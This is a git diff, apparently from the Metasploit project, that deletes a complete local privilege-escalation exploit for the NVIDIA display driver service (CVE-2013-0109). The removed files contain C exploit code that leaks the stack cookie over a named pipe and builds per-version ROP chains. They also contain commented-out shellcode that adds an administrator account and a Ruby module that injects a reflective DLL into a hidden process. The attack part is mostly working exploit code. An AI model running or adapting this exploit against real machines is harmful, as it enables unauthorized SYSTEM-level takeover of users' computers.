- - -C:\Users\Peter\Desktop\NVDelMe1> - -*/ - -#include -#include -#define SCSIZE 2048 -char code[SCSIZE] = "PAYLOAD:"; - -enum EProtocolAction -{ - ProtocolAction_Connect = 0, - ProtocolAction_Receive, - ProtocolAction_Send, - ProtocolAction_Disconnect, - ProtocolAction_ReadCookie, -}; - -typedef struct { - EProtocolAction Action; - PBYTE Buf; - DWORD Length; -} ProtocolMessage; - -const int GENERIC_BUF_LENGTH = 0x10000; - -#define WriteByte(val) {buf[offs] = val; offs += 1;} -#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} -#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} -#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} -#define BufRemaining() (sizeof(buf) - offs) - -DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) -{ - DWORD dwWritten = 0; - - if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) - return dwWritten; - - return 0; -} - -DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) -{ - DWORD dwRead = 0, dwAvailable = 0; - - if(bTimeout) - { - for(DWORD i=0; i < 30; i++) - { - if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) - goto Cleanup; - - if(dwAvailable) - break; - - Sleep(100); - } - - if(!dwAvailable) - goto Cleanup; - } - - if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) - goto Cleanup; - -Cleanup: - return dwRead; -} - -HANDLE EstablishPipeConnection(char *pszPipe) -{ - HANDLE hPipe = CreateFileA( - pszPipe, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - 0, - NULL - ); - - if(hPipe == INVALID_HANDLE_VALUE) - { - return NULL; - } - - return hPipe; -} - -BYTE *BuildMalicious_LeakStack() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - - for(UINT i=0; i<0x2000; i++) - WriteWord(0x41); - - WriteWord(0); - - WriteDword(0); - WriteDword(0x4078); - - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - WriteDword(0x41414141); - - 
return buf; -} - -BYTE *BuildMalicious_FillBuf() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - WriteWord(0); // string - - WriteDword(0); - WriteDword(0x4000); - - while(BufRemaining()) - WriteDword(0x43434343); - - return buf; -} - -BYTE *BuildMalicious_OverwriteStack() -{ - static BYTE buf[0x4020] = {0}; - UINT offs = 0; - - WriteWord(0x52); - WriteWord(0); // string - - WriteDword(0); - WriteDword(0x4340); // enough to copy shellcode too - - while(BufRemaining()) - WriteDword(0x42424242); - - return buf; -} - -extern "C" int run() -{ - DWORD dwReturnCode = 1, dwBytesInOut = 0; - HANDLE hPipe = NULL; - - static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0}; - - memset(rgReadBuf, 0, sizeof(rgReadBuf)); - - ProtocolMessage rgConvoMsg[] = { - {ProtocolAction_Connect, NULL, 0}, - {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4200}, - {ProtocolAction_ReadCookie, {0}, 0}, - {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4000}, - {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020}, - {ProtocolAction_Receive, {0}, 0x4200}, - {ProtocolAction_Disconnect, NULL, 0}, - }; - - DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; - BOOL bTryAgain = FALSE; - char szPipe[256] = {0}; - - // We could renable remote hosts to target other devices on network?! - //if(stricmp(argv[1], "local") == 0) - strcpy(szPipe, "\\\\.\\pipe\\nvsr"); - //else - // sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); - - while(i < dwNumberOfMessages) - { - printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); - - switch(rgConvoMsg[i].Action) - { - case ProtocolAction_Connect: - printf(" - CONNECT\n"); - - hPipe = EstablishPipeConnection(szPipe); - if(!hPipe) - { - printf("!! 
Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); - goto Cleanup; - } - - break; - case ProtocolAction_Disconnect: - printf(" - DISCONNECT\n"); - - CloseHandle(hPipe); - hPipe = NULL; - - break; - case ProtocolAction_Send: - printf(" - CLIENT => SERVER\n"); - - if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) - { - printf("!! Error writing to pipe\n"); - goto Cleanup; - } - - printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); - - break; - case ProtocolAction_Receive: - printf("\t - SERVER => CLIENT\n"); - - if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) - { - printf("!! Error reading from pipe (at least, no data on pipe)\n"); - goto Cleanup; - } - - printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); - - break; - case ProtocolAction_ReadCookie: - - // x64 Metasploit cmd/exec: - // "net user r00t r00t00r! /add & net localgroup administrators /add" - // exitfunc=thread - /*char code[] = "" - "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" - "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" - "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" - "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" - "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" - "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" - "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" - "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" - "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" - "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" - "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" - "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" - "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" - "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" - 
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" - "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" - "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" - "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" - "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" - "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" - "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" - "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" - "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/ - printf("Building exploit ...\n"); - unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); - printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); - - memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); - - unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; - - // Perform some limited fingerprinting (my default install version, vs latest at time of testing) - switch(uiRetnAddress & 0xfff) - { - case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d - { - uiBase = uiRetnAddress - 0x4640; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn - pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... 
- pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn - pRopChain[10] = 0; // Padding - pRopChain[11] = 0; // ... - pRopChain[12] = 0; // ... - pRopChain[13] = 0; // ... - pRopChain[14] = 0; // ... - pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn - pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect - pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn - pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax - pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) - - memcpy(pRopChain + 22, code, sizeof(code)); - } - break; - case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f - { - uiBase = uiRetnAddress - 0x39f1; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn - pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding ... - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... 
- pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn - pRopChain[10] = 0; // Padding ... - pRopChain[11] = 0; // ... - pRopChain[12] = 0; // ... - pRopChain[13] = 0; // ... - pRopChain[14] = 0; // ... - // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE - pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn - pRopChain[18] = 0; // Padding ... - pRopChain[19] = 0; // ... - pRopChain[20] = 0; // ... - pRopChain[21] = 0; // ... - pRopChain[22] = 0; // ... - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn - pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130 - pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn - pRopChain[26] = 0; // Padding ... - pRopChain[27] = 0; // ... - pRopChain[28] = 0; // ... - pRopChain[29] = 0; // ... - pRopChain[30] = 0; // ... 
- pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax - pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp - - memcpy(pRopChain + 33, code, sizeof(code)); - } - break; - case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b - { - uiBase = uiRetnAddress - 0x3a11; - printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); - - pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); - - // Param 1: lpAddress [r11 (near rsp) into rcx] - pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn - pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn - pRopChain[2] = 0; // Padding ... - pRopChain[3] = 0; // ... - pRopChain[4] = 0; // ... - pRopChain[5] = 0; // ... - pRopChain[6] = 0; // ... - pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn - pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] - pRopChain[9] = 0; // Padding ... - // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] - pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn - pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE - pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn - pRopChain[13] = 0; // Padding ... - pRopChain[14] = 0; // ... - pRopChain[15] = 0; // ... - pRopChain[16] = 0; // ... - pRopChain[17] = 0; // ... - // Param 4: lpflOldProtect [r9 - already points at writable location] - pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn - pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 - pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn - pRopChain[21] = 0; // Padding ... - pRopChain[22] = 0; // ... - pRopChain[23] = 0; // ... - pRopChain[24] = 0; // ... - pRopChain[25] = 0; // ... 
- pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax - pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn - - memcpy(pRopChain + 28, code, sizeof(code)); - } - break; - } - - break; - } - - i++; - } - - dwReturnCode = 0; -Cleanup: - if(hPipe) - CloseHandle(hPipe); - - return dwReturnCode; -} \ No newline at end of file diff --git a/external/source/exploits/cve-2013-0109/rdi.sln b/external/source/exploits/cve-2013-0109/rdi.sln deleted file mode 100644 index b490cb423d..0000000000 --- a/external/source/exploits/cve-2013-0109/rdi.sln +++ /dev/null 
@@ -1,32 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 11.00 -# Visual C++ Express 2010 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|ARM = Debug|ARM - Debug|Win32 = Debug|Win32 - Debug|x64 = Debug|x64 - Release|ARM = Release|ARM - Release|Win32 = Release|Win32 - Release|x64 = Release|x64 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 - {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb deleted file mode 100644 index f47e3657c4..0000000000 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ /dev/null 
@@ -1,188 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex' -require 'msf/core/post/common' -require 'msf/core/post/windows/priv' -require 'msf/core/post/windows/process' -require 'msf/core/post/windows/services' - -class Metasploit3 < Msf::Exploit::Local - Rank = AverageRanking - - include Msf::Post::File - include Msf::Post::Windows::Priv - include Msf::Post::Windows::Process - include Msf::Post::Windows::Services - - def initialize(info={}) - super(update_info(info, { - 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', - 'Description' => %q{ - The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to - interact with the service. It contains a stacked based buffer overflow as a result - of a memmove operation. - - N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! - - This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. - It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Peter Wintersmith', # Original exploit - 'Ben Campbell ', # Metasploit integration - ], - 'Arch' => ARCH_X86_64, - 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Targets' => - [ - [ 'Automatic', { } ] - ], - 'Payload' => - { - 'Space' => 2048, - 'DisableNops' => true - }, - 'References' => - [ - [ 'CVE', '2013-0109' ], - [ 'OSVDB', '88745' ], - [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ], - ], - 'DisclosureDate' => 'Dec 25 2012', - 'DefaultTarget' => 0 - })) - - end - - def check - vuln_hashes = [ '43f91595049de14c4b61d1e76436164f', - '3947ad5d03e6abcce037801162fdb90d', - '3341d2c91989bc87c3c0baa97c27253b' ] - - os = sysinfo["OS"] - if os =~ /windows/i - svc = service_info 'nvsvc' - if svc and svc['Name'] =~ /NVIDIA/i - vprint_good("Found service '#{svc['Name']}'") - - begin - unless is_running? - print_error("Service is not running!") - else - print_good("Service is running") - end - rescue RuntimeError => e - print_error("Unable to retrieve service status") - end - - if sysinfo['Architecture'] =~ /WOW64/i - # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) 
- return Exploit::CheckCode::Detected - else - path = svc['Command'].strip - end - - begin - hash = client.fs.file.md5(path).unpack('H*').first - rescue Rex::Post::Meterpreter::RequestError => e - print_error("Error checking file hash: #{e}") - return Exploit::CheckCode::Detected - end - - if vuln_hashes.include?(hash) - vprint_good("Hash '#{hash}' is listed as vulnerable") - return Exploit::CheckCode::Vulnerable - else - vprint_status("Hash '#{hash}' is not recorded as vulnerable") - return Exploit::CheckCode::Detected - end - else - return Exploit::CheckCode::Safe - end - end - end - - def create_proc - windir = expand_path("%windir%") - cmd = "#{windir}\\SysWOW64\\notepad.exe" - return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid - end - - def is_running? - begin - status = service_status('nvsvc') - return (status and status[:state] == 4) - rescue RuntimeError => e - print_error("Unable to retrieve service status") - return false - end - - end - - def exploit - unless is_running? 
- print_error("Service not running - attempting to start") - res = service_start('nvsvc') - case res - when 0 - print_good("Service started") - when 1 - print_status("Service already started") - else - fail_with(Exploit::Failure::Unknown, "Unable to start service") - end - else - print_good("Service is running") - end - - dll = '' - offset = nil - file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll") - File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) } - - pay = payload.encoded - - bo = dll.index('PAYLOAD:') - raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo - dll[bo, pay.length] = [pay].pack("a*") - - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end - - print_error("No offset found") unless offset - - new_pid = create_proc - - if not new_pid - fail_with(Exploit::Failure::Unknown, "Failed to create a new process") - end - - vprint_status("Injecting payload into memory") - host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) - mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) - host_process.memory.protect(mem) - host_process.memory.write(mem, dll) - print_status("Executing exploit...") - host_process.thread.create(mem+offset) - end -end -